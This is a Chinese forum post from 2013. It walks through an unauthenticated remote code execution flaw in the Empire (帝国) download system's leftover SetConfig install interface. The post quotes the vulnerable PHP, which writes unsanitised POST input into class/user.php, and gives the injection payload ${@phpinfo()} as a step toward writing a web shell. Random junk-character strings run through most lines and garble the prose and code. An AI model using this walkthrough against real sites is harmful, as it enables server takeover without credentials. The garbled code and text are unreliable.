这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
1 E/ i, T! h8 Y" ~1 A( M1 l3 ]/ T& k! p. |- q) A8 s- e
% I9 z) a% V4 @, F这是帝国的一套下载系统 如图
# @# B2 R" H& l2 K3 {! }/ zps(不需要任何账户和密码,直接写shell)
E, r& F( }( S, A: c! k由于很多站是由于下载要整合discuz 等等一些论坛....( r& P+ h4 t; E+ o- l
! o! ?+ j8 T5 W
而帝国他又有一个万能接口,如图
* g8 C2 y8 K1 y0 r. u' K+ A R; r( V9 e0 k0 R( A
) R/ D- h9 P3 g8 v0 \: k* T而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
+ X, Q1 Q& X6 p# {
' f. R- I* S1 m4 d% T, D% x: }# i当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪& \5 c* ~: Q5 Z [7 ]9 P) p8 V
5 _8 \7 |9 `& c/ C( t
在data/fun.php中的15行
8 _% B. y1 [) o' m% y+ B* A& i
$ Q, j v0 ?1 z我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {' v" p" [1 X: m
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
4 U' O. j* o& E& Q5 Q- v( [" z7 C @" U: y# O; {9 ]4 C4 q0 k* l% E
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
N$ ^; K# R# O/ q8 x. F& P/ ^ @# e* D- q
他将传进来的变量进行了切割,然后赋给了$filetext
' [# Z+ y/ F; t+ `% N9 E4 R+ {/ @ t8 s8 i- p
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了. m O$ F5 J; S2 \
) ^% G p; i r# T2 s0 {- G F我们看看写入的结果,随便填一个
8 j5 J5 e8 z9 @# l( e: K i: q
! V7 }, M* o5 x& _
9 w+ P% [7 k# |" j1 k
( k% q3 O! H! F% X* h8 a* m: W& A6 V7 `$ h: ?, |# p1 q
A; e$ [, n+ d) c- r6 y. M5 r5 ~: u: r
4 {$ v z8 s& Y) H8 u
: N/ N% Z6 r- P7 s& j4 n
4 ?! y; I4 b! S* F1 D* P
c2 C; H& U% t" d" }( H
$ N" C+ |+ m" b' S' i5 V. y/ i4 L9 f* T9 [
" ]3 f- P* A/ U; U2 s% N" O0 q' @& A! h4 @. O e |9 |& t0 L
1 Q K( J+ A0 [* P
% |# T% C7 `' o3 _" b
' [6 u1 }$ C# z# o! d7 |+ _! y8 I0 s' p; _5 o8 i7 Z3 q
2 W8 M; Y% @2 H; Q% E2 c' x7 z7 U; i& v S" [, B; v
8 K: h5 [" Q" p; F! k0 `所以我们淫荡点,写个${@phpinfo()}试试 j; a: B3 O) C; `
然后访问以下class/user.php这个文件
9 h3 Q/ K" Y# c日了吧 : {9 ~- R* Q L1 x& D
3 t+ }6 Q8 e8 Q& X
* @1 \4 d5 e, G3 |! N7 R" H' g( L) B
9 [# }5 a0 \: [+ ?( h0 g
/ D* _! l6 U; f. M8 h% {5 w- h | 
发表于 2013-1-23 09:34:37
收藏
支持
反对